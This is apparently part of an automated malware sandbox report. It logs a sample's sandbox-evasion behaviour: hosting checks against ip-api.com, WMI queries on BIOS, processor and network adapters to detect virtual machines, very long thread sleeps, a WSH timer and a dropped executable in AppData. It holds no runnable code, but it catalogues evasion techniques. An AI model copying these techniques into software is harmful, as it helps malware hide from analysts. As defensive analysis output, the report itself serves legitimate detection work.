Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 208D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 1FC20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20CE0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 208C0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 49E0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20C60000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20AF0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540167	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599978	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540042
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599838
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599697
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 480060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 420140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2831	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7066	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2599
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7355
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2713	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 7086	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 674
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1753
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5945
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1200
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2272
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4247
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5365
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 7240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2550

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3272	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3500	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 3528	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -594727s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784	Thread sleep count: 2599 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784	Thread sleep count: 7355 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3920	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1968	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -12000000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -540167s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -599978s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -79813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -59980s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2572	Thread sleep time: -39971s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1236	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612	Thread sleep count: 3950 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612	Thread sleep count: 5945 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe TID: 3876	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1652	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep count: 3028 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep count: 2272 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1544	Thread sleep time: -1200000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -1800000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -540042s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -599838s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -599697s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -480060s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -119938s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -420140s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -119969s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -100000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -79783s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -80245s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -60268s >= -30000s
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe TID: 3824	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4088	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -1800000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -1100000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -80338s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -80422s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540167	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599978	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 79813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 59980	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 39971	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540042
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599838
